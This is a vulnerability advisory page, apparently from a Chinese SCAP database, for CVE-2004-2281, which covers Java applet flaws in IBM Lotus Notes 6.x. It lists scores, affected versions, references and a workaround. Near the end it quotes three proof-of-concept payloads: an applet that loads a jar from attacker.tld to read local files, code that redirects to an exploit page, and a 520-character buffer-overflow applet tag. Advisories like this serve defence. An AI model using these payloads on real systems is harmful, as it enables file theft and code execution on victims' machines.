CVE-2004-2281
CVSS10.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:43:41
NMCOS    

[原文]Multiple unknown vulnerabilities in IBM Lotus Notes 6.5.x before 6.5.4 and 6.0.x before 6.0.5 have unknown impact and attack vectors, related to Java applets, as identified by (1) KSPR5YS6GR and (2) KSPR62F4D3.


[CNNVD]IBM Lotus Notes多个未明安全漏洞(CNNVD-200412-380)

        
        Lotus Domino/Notes服务器是一款基于WEB合作的应用程序架构,运行在Linux/Unix和Microsoft Windows操作系统平台下。
        IBM Lotus Notes存在三个未明漏洞,远程攻击者可以利用这些漏洞破坏Lotus Notes。
        目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ibm:lotus_notes:6.0.3IBM Lotus Notes 6.0.3
cpe:/a:ibm:lotus_notes:6.5.2IBM Lotus Notes 6.5.2
cpe:/a:ibm:lotus_notes:6.5.1IBM Lotus Notes 6.5.1
cpe:/a:ibm:lotus_notes:6.0.4IBM Lotus Notes 6.0.4
cpe:/a:ibm:lotus_notes:6.5IBM Lotus Notes 6.5
cpe:/a:ibm:lotus_notes:6.5.3IBM Lotus Notes 6.5.3
cpe:/a:ibm:lotus_notes:6.0IBM Lotus Notes 6.0
cpe:/a:ibm:lotus_notes:6.0.2IBM Lotus Notes 6.0.2
cpe:/a:ibm:lotus_notes:6.0.1IBM Lotus Notes 6.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2281
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2281
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-380
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/8417
(PATCH)  OSVDB  8417
http://www.osvdb.org/8416
(PATCH)  OSVDB  8416
http://www-1.ibm.com/support/docview.wss?rs=475&context=SSKTWP&q1=Java&uid=swg21173910&loc=en_US&cs=utf-8&lang=en
(PATCH)  CONFIRM  http://www-1.ibm.com/support/docview.wss?rs=475&context=SSKTWP&q1=Java&uid=swg21173910&loc=en_US&cs=utf-8&lang=en
http://secunia.com/advisories/12046
(VENDOR_ADVISORY)  SECUNIA  12046
http://www.securityfocus.com/bid/10704
(UNKNOWN)  BID  10704

- 漏洞信息

IBM Lotus Notes多个未明安全漏洞
危急 未知
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Lotus Domino/Notes服务器是一款基于WEB合作的应用程序架构,运行在Linux/Unix和Microsoft Windows操作系统平台下。
        IBM Lotus Notes存在三个未明漏洞,远程攻击者可以利用这些漏洞破坏Lotus Notes。
        目前没有详细漏洞细节提供。
        

- 公告与补丁

        厂商补丁:
        IBM
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.ers.ibm.com/

- 漏洞信息

8416
IBM Lotus Notes Client Unspecified Java Applet Handling (KSPR5YS6GR)
Location Unknown Attack Type Unknown
Impact Unknown
Exploit Unknown

- 漏洞描述

IBM Lotus Notes contains several flaws related to the handling of Java applets. No further details have been provided.

- 时间线

2004-07-13 Unknow
Unknow Unknow

- 解决方案

Install the designated patch (SPR# KSPR5YS6GR), as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: For current releases of Lotus Notes, Java applets can be disabled. To disable Java applets, select File -> Preferences -> User Preferences from the Notes client menu and uncheck the option for "Enable Java applets."

- 相关参考

- 漏洞作者

- 漏洞信息

IBM Lotus Notes Multiple Java Applet Vulnerabilities
Unknown 10704
Yes No
2004-07-13 12:00:00 2007-01-02 07:56:00
Discovery of these issues is credited to Jouko Pynnonen.

- 受影响的程序版本

IBM Lotus Notes 6.5.2
IBM Lotus Notes 6.5
IBM Lotus Notes 6.0.4
IBM Lotus Notes 6.0.1
IBM Lotus Notes 6.0
IBM Lotus Notes 6.5.4
IBM Lotus Notes 6.0.5

- 不受影响的程序版本

IBM Lotus Notes 6.5.4
IBM Lotus Notes 6.0.5

- 漏洞讨论

IBM Lotus Notes is affected by three vulnerabilities concerning Java applets.

An attacker can exploit these issues to disclose potentially sensitive information, cause a web browser to open an arbitrary web page, and cause a stack-based buffer overflow that may be exploited to execute arbitrary code.

IBM has confirmed these vulnerabilities and has stated that they are currently under investigation. IBM problem reports for these vulnerabilities are KSPR5YS6GR, KSPR62F4D3, and KSPR62F4KN.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

The following proofs of concept are available:

Information disclosure:
<applet codebase="file:///" archive="http://www.attacker.tld/applet.jar" width="1" height="1"></applet>

Arbitrary browser opening:
public void init() {
getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html");
}

Stack-based buffer overflow:
<applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA" code="java.applet.Applet" width=100 height=100></applet>

- 解决方案

IBM has released updates to address these issues. Please see the referenced advisory for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站